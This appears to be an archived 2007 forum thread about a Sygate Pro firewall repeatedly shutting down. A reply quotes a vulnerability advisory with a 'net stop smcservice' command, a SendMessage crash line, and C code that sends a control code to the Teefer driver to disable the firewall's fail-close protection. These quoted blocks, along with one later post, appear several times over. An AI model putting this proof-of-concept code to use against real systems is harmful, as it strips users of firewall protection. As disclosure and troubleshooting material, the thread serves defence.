I use Sygate Pro 5.5 (build 2710) on one of the computers that I use to access the Internet, along with the XP Home OS. A few weeks ago I lost my Internet connection. While troubleshooting, my mouse passed over the Sygate icon in the system tray, and the icon then disappeared -- indicating that Sygate had shut down. Then I remembered that I was using the Sygate option that blocks all Internet traffic when Sygate is not active.
I opened Sygate back up and experienced no further problems with my connection. The next night, the same thing happened again, except it occurred at least six times. As soon as I opened Sygate back up and re-established my Internet connection, it would get shut down again. Finally, I waited about an hour and tried again. This time Sygate remained open and has not shut down since then.
When I experienced these shutdown problems, I had not done anything out of the ordinary. No new software installs, etc.
However, I had about 75 Web sites open during those two days, and I hadn't downloaded any new Microsoft security updates for at least a month. Plus, I had let NAV expire, because I only go to safe sites, and don't do anything risky online. Also, I use FireFox with the "NoScript" extension. As for email, I open it in plain text only.
I installed AVG anti-spyware and BoClean after the second night, but it hasn't detected anything. I also installed an AVG anti-rootkit program. My theory is that the lack of MS security updates at the time allowed a hacker to gain access through a possibly compromised web site that was open at the time.
My question is what kind of access did the hacker need in order to do what he did? Meaning, would it have required full access to my computer, in the sense that he would also have been able to install a backdoor and keylogger? And he's just patiently waiting until I access my bank accounts so he can steal my passwords and clean out my accounts?
In other words, would he have been able to shut down Sygate without being able to do anything else? And once the possible compromised web site was shut down, and the MS security updates were installed, he was then locked out?
My concern is that since he was able to shut Sygate down over and over, he had full access to my computer, and now 'owns' it. He's probably getting copies of all my email, etc., and is able to get AVG and BoClean to ignore his malware.
But then again, why would he be so determined to shut down Sygate if he had full access to my PC. Could it be because he wanted to use my computer as a server, or in a DOS attack, and he needs the firewall to be shut down in order to do that? Also, if he has full access, he could simply uncheck that option in Sygate that shuts off my connection, unless he just doesn't know about it.
Consequently, I'm thinking the only practical solution is to reformat -- which I definitely don't want to do if I don't have to. Please let me know your opinions on this.
BTW, I've been using Sygate Pro for more than five years, and this is the first time that something like this has ever happened.
Full Version: Firewall shut down multiple times by hacker
- Hasnt Sygate been taken over by Symantec and been intergrated into Norton Internet Security? Does this not mean your firewall is highly outdated? (I have been looking for the version in question and the last one seems to have been March 2005)
- Are you up to date with all microsoft patches?
- If you are worried about your computer being compromised I would move all sensetive data to another computer or delete it at once.
- Are you definitely sure its a hacker shutting down your firewall? If I were a hacker I would either use a program to kill your firewall and remove it or to disable all your antiviruses. I do not think he would manually shut down your firewall as it would be easier to remove it.
- You are correct in thinking that if your system is already compromised and he has found a way in then why would he need to shut down your firewall. That is a question I would also like to know. The only thing I could think of is that the hacker would want to run a peice of software to connect to the internet and maybe Sygate notifies the user when I program wants to connect to the net. Unfortunately I have never used Sygate before so I would not be able to tell you on that one.
QUOTE
Sygate Personal Firewall Pro (SPFP) is implemented as a user-space service
(smc.exe), and as a kernel-space NDIS intermediate driver (teefer.sys).
The driver creates a device named \\device\Teefer. The user-space service
(smc.exe, tfman.dll) communicates with the kernel-space driver through
this device using specific Device I/O control codes.
The driver does not validate the source of the control codes, allowing
malicious programs to send control codes to the driver and disable its
fail-close protection. SPFP attempts to prevent this by allowing only one
program in user-space to open a handle to its driver. Theoretically, as
long as smc.exe is running, no other program can access the driver. This
simple protective measure can be circumvented in two ways:
1. If the program is running with administrative permissions it can simply
stop smc.exe:
net stop smcservice
2. A non-administrative program can exploit the ListView control in SPFP's
GUI in order to crash the service. An example of the line of code needed
to do this is given below:
SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);
The fail-safe mechanism then will disable all incoming and outgoing
traffic by using the following code:
hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("Open failed\n");
}
else
{
printf("Device opened.\n");
char buffer[8];
DWORD *ptr = (DWORD *)buffer;
DWORD *ptr2 = (DWORD *)(buffer + 4);
DWORD ret;
*ptr = 0;
*ptr2 = 0;
if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
&ret, 0))
printf("Sent.\n");
CloseHandle(hDevice);
}
(smc.exe), and as a kernel-space NDIS intermediate driver (teefer.sys).
The driver creates a device named \\device\Teefer. The user-space service
(smc.exe, tfman.dll) communicates with the kernel-space driver through
this device using specific Device I/O control codes.
The driver does not validate the source of the control codes, allowing
malicious programs to send control codes to the driver and disable its
fail-close protection. SPFP attempts to prevent this by allowing only one
program in user-space to open a handle to its driver. Theoretically, as
long as smc.exe is running, no other program can access the driver. This
simple protective measure can be circumvented in two ways:
1. If the program is running with administrative permissions it can simply
stop smc.exe:
net stop smcservice
2. A non-administrative program can exploit the ListView control in SPFP's
GUI in order to crash the service. An example of the line of code needed
to do this is given below:
SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);
The fail-safe mechanism then will disable all incoming and outgoing
traffic by using the following code:
hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("Open failed\n");
}
else
{
printf("Device opened.\n");
char buffer[8];
DWORD *ptr = (DWORD *)buffer;
DWORD *ptr2 = (DWORD *)(buffer + 4);
DWORD ret;
*ptr = 0;
*ptr2 = 0;
if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
&ret, 0))
printf("Sent.\n");
CloseHandle(hDevice);
}
If you have any questions feel free to ask.
QUOTE (Nebon @ Aug 7 2007, 05:35 AM) 
- Hasnt Sygate been taken over by Symantec and been intergrated into Norton Internet Security? Does this not mean your firewall is highly outdated? (I have been looking for the version in question and the last one seems to have been March 2005)
- Are you up to date with all microsoft patches?
- If you are worried about your computer being compromised I would move all sensetive data to another computer or delete it at once.
- Are you definitely sure its a hacker shutting down your firewall? If I were a hacker I would either use a program to kill your firewall and remove it or to disable all your antiviruses. I do not think he would manually shut down your firewall as it would be easier to remove it.
- You are correct in thinking that if your system is already compromised and he has found a way in then why would he need to shut down your firewall. That is a question I would also like to know. The only thing I could think of is that the hacker would want to run a peice of software to connect to the internet and maybe Sygate notifies the user when I program wants to connect to the net. Unfortunately I have never used Sygate before so I would not be able to tell you on that one.
QUOTE
Sygate Personal Firewall Pro (SPFP) is implemented as a user-space service
(smc.exe), and as a kernel-space NDIS intermediate driver (teefer.sys).
The driver creates a device named \\device\Teefer. The user-space service
(smc.exe, tfman.dll) communicates with the kernel-space driver through
this device using specific Device I/O control codes.
The driver does not validate the source of the control codes, allowing
malicious programs to send control codes to the driver and disable its
fail-close protection. SPFP attempts to prevent this by allowing only one
program in user-space to open a handle to its driver. Theoretically, as
long as smc.exe is running, no other program can access the driver. This
simple protective measure can be circumvented in two ways:
1. If the program is running with administrative permissions it can simply
stop smc.exe:
net stop smcservice
2. A non-administrative program can exploit the ListView control in SPFP's
GUI in order to crash the service. An example of the line of code needed
to do this is given below:
SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);
The fail-safe mechanism then will disable all incoming and outgoing
traffic by using the following code:
hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("Open failed\n");
}
else
{
printf("Device opened.\n");
char buffer[8];
DWORD *ptr = (DWORD *)buffer;
DWORD *ptr2 = (DWORD *)(buffer + 4);
DWORD ret;
*ptr = 0;
*ptr2 = 0;
if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
&ret, 0))
printf("Sent.\n");
CloseHandle(hDevice);
}
If you have any questions feel free to ask.
Hi Nebon,
1) True, Sygate was sold to Symantec, but the outdated version has a reputation for being better than many newer firewalls, in that the basic functions work very well.
2) I updated the MS patches immediately after the Sygate shutdowns on the second day.
3) RE: "Are you definitely sure its a hacker shutting down your firewall". No, not after some more troubleshooting I did yesterday. I believe now there's a good possibility my OS was shutting it down due to lack of resources/ram from having too many programs and web sites open. Or Sygate may even have been shutting itself down because it didn't have the memory necessary to do its job effectively. The most likely scenario is that it may simply have been crashing when it ran out of memory.
4) Sygate does have a good warning system asking permission for programs to access the Internet.
5) Thanks for the warning about the vulnerabilities. I thought Sygate was too solid to be vulnerable to new exploits, but apparently not. After reading that example you included, I'll probably be switching to Outlook, as I think it's the closest to Sygate in terms of features.
Thanks for the info.
Okay, I am glad to help. Good job you now have that under control :thumbup:
QUOTE (Nebon @ Aug 7 2007, 10:35 AM)
Sygate .. is highly outdated?
+1
I too have had a similar firewall failure to what xyz described. It too occurred when memory was heavily taxed.
I cannot speak to the question of whether significant security vulnerabilities have been found in the Sygate firewall since it was maintained, except to say that a security expert (the kind that presents papers at the Black Hat Conference) recently recommended it to me.
I can speak to a large vulnerability in most personal firewalls. Personal firewalls start after the OS is running and are shutdown before the OS ceases to run. This allows two time windows during which traffic can completely bypass the firewall. I have asked many personal firewall vendors about protection in these windows. Only two that I have found, have claimed to protect the computer during these times. One was Sygate. Using Ethereal, I have verified that the only traffic that Sygate passes is the needed housekeeping traffic associated with obtaining connection to the local LAN. When I monitored the other firewall that made such a claim, I learned that bypassing a firewall is a real threat. It allowed ten seconds of traffic at DSL speeds to bypass the firewall.
At this point I can only speculate where that traffic was going. It appears to be from call-home programs that are loaded before the firewall. Whether these are from malware or a Microsoft OS "feature," I do not know. I do know that if it is malware it is so sophisticated that multiple malware scanners cannot find it. With that in mind I present the following:
1) Do not be quick to get rid of your "old" Sygate firewall, it may still be the best personal firewall available.
2) Please let me know if there are any other personal firewalls that really do prevent this kind of firewall bypassing attack.
3) Please let me know of any vulnerabilities in the Sygate firewall, particularly ones that are more serious than the bypass attack described above.
I cannot speak to the question of whether significant security vulnerabilities have been found in the Sygate firewall since it was maintained, except to say that a security expert (the kind that presents papers at the Black Hat Conference) recently recommended it to me.
I can speak to a large vulnerability in most personal firewalls. Personal firewalls start after the OS is running and are shutdown before the OS ceases to run. This allows two time windows during which traffic can completely bypass the firewall. I have asked many personal firewall vendors about protection in these windows. Only two that I have found, have claimed to protect the computer during these times. One was Sygate. Using Ethereal, I have verified that the only traffic that Sygate passes is the needed housekeeping traffic associated with obtaining connection to the local LAN. When I monitored the other firewall that made such a claim, I learned that bypassing a firewall is a real threat. It allowed ten seconds of traffic at DSL speeds to bypass the firewall.
At this point I can only speculate where that traffic was going. It appears to be from call-home programs that are loaded before the firewall. Whether these are from malware or a Microsoft OS "feature," I do not know. I do know that if it is malware it is so sophisticated that multiple malware scanners cannot find it. With that in mind I present the following:
1) Do not be quick to get rid of your "old" Sygate firewall, it may still be the best personal firewall available.
2) Please let me know if there are any other personal firewalls that really do prevent this kind of firewall bypassing attack.
3) Please let me know of any vulnerabilities in the Sygate firewall, particularly ones that are more serious than the bypass attack described above.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.